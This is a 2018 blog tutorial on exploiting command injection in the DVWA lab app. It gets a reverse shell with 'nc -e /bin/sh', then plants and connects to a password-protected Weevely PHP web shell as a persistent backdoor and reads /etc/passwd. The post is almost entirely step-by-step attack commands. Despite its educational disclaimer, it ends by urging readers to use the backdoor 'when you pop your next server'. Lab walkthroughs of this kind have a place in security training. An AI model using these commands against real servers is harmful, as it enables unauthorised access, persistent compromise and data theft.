Create a Persistent Back Door with Kali, Netcat and Weevely

This post will dive into how we can take advantage of a vulnerability in a web application to gain access and upload a backdoor that we can connect to in the future.

As always, this post is for educational purposes and should not be used on live networks. So we are using our internal network for this demonstration.


We will be creating a backdoor in DVWA Command Execution module, which is a web app on Metasploitable.


To start with, change the security settings from high to low on DVWA Security Tab above.


Next we will need to move to the Command Execution module. The page just does a ping scan. so let’s try it.


We will enter an IP address and click on submit.


Let see if it will also run other commands other than ping. We will try to run a Netcat command in the text box so on the Kali machine command line type:

nc -vv -l -p 8888

8888 is the port we want to listen on


Next, in DVWA, type any IP then ; then nc -e /bin/sh 8888 and connect with Kali machine from website as seen below.


Connection established, we have full control of the web app.



Now we have full command line controls on the website we can run any commands we wish. We want to create a persistent back door now and upload it to the website.

First we need to generate a backdoor with Weevely, back on the Kali machine, in a new console window type:

weevely generate 123456 /root/shell.txt

123456 will be our password which we will use later.


Copy it to:

cp /root/shell.txt /var/www/html

so we can see it in our browser.


Make sure it’s copied. shell.txt is in /var/www/html. We can see shell.txt on the right hand side.


Next we start the server on the Kali machine. Start the server:

service apache2 start


On Kali browser go to or localhost/shell.txt to confirm file is there.


We still  have a netcat connection on the server so we can wget our shell.txt file:


and the shell.txt should show uploaded


The file has been uploaded, next we need to change it to php extension for it to run.

Mv shell.txt shell.php


Connect to the upload in Kali:

weevely 123456



We are connected with a backdoor in DVWA. NOW we have the backdoor in DVWA we can run some helpful commands, for instance.


this will give you a list of commands you can run on your back door. Interesting ones are:



cat /etc/passwd


Another interesting command we can use is :

audit_etcpasswd -vector <option>

To upload a file to the target system:

:file_download rpath

is remote path and lpath for local.

So have a play around with Weevely when you pop your next server.

Thanks for reading and don’t forget to comment, like and of course, follow our blog for future tutorials.

QuBits 2018-09-13


1 Comment

Leave a Reply

Please log in using one of these methods to post your comment: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.